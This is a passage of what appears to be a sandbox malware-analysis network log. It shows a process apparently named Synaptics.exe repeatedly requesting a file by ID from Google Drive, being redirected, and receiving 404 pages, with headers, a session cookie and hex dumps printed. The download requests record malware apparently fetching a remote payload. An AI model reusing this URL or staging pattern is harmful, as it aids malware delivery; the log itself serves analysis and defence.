                                                                                                                              2024-12-30 10:48:42 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 73 46 4d 42 45 6d 67 58 37 71 2d 34 64 67 6a 4e 30 4e 42 44 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="vsFMBEmgX7q-4dgjN0NBDw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:42 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              139192.168.2.450039142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DufYHdF5QPoXYXlGqubqrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              140192.168.2.450041142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-rKXPgey7Yhg7cO1iQHim1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              141192.168.2.450042142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:42 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7CRSRkf-rzrzb0jxftGaI4Hd_Hs61heOcJ3Whv5-Jio8-hgYoFMqEqucGAJwzYki7X
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:42 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UlgwiM-jEEIbFbFHR5T9aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:42 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                              2024-12-30 10:48:42 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 53 50 4d 6c 4d 6f 6d 63 4a 79 63 71 68 41 32 49 37 52 4f 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                              Data Ascii: t Found)!!1</title><style nonce="xSPMlMomcJycqhA2I7ROgA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                              2024-12-30 10:48:42 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              142192.168.2.450057142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--uh3qQaWGzJGEcTEmZg-Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              143192.168.2.450056142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AoLCixW70Sbx-7rxm6ZQCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              144192.168.2.450067142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:45 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6nq9AlGz-AY3mZIjzYUDT2QAKvSI45gCe1OVwUDC9uyxzuUdaAPPBvWPmyAj57NoS4Jiciu7A
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-88T30mRbMw1eZAwv1v5KVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4a 6e 38 75 38 54 44 52 72 50 77 4c 62 67 64 64 6c 54 34 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="jJn8u8TDRrPwLbgddlT4GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              145192.168.2.450066142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-HMTHDTLYo4FKI9R83A4Hkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              146192.168.2.450068142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
